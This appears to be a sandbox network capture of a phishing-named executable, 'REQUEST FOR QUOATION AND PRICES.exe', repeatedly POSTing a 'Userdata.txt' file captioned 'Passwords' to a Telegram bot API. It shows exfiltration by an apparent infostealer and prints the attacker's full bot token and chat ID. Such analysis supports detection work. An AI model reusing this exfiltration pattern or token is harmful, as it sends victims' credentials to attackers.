                                                                                                                              2024-12-03 14:23:29 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":987,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235809,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.749913149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:32 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd14f729073a19
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:23:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 34 66 37 32 39 30 37 33 61 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd14f729073a19Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:32 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:32 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:32 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":988,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235812,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.749925149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:36 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1529483e469f
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 35 32 39 34 38 33 65 34 36 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1529483e469fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:37 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:37 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:37 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":989,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235817,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.749935149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:40 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd15571ad6327b
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 35 35 37 31 61 64 36 33 32 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd15571ad6327bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:41 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:40 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:41 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":990,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235820,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.749943149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:44 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd1584a2f82aa8
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 35 38 34 61 32 66 38 32 61 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd1584a2f82aa8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:44 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:44 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:44 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":991,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235824,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.749951149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:47 UTC275OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd15b70a124c6d
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              2024-12-03 14:23:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 35 62 37 30 61 31 32 34 63 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd15b70a124c6dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:48 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:48 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:48 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":992,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235828,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.749962149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:51 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd15f5efddc12b
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:23:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 35 66 35 65 66 64 64 63 31 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd15f5efddc12bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:52 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:51 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              2024-12-03 14:23:52 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 37 36 34 34 38 30 35 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 68 7a 74 73 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 35 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":993,"from":{"id":7876448059,"is_bot":true,"first_name":"Ghztsty","username":"Ghztsty_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1733235831,"document":{"file_nam


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.749968149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:54 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd16309522eae9
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:23:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 36 33 30 39 35 32 32 65 61 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd16309522eae9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:55 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:55 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
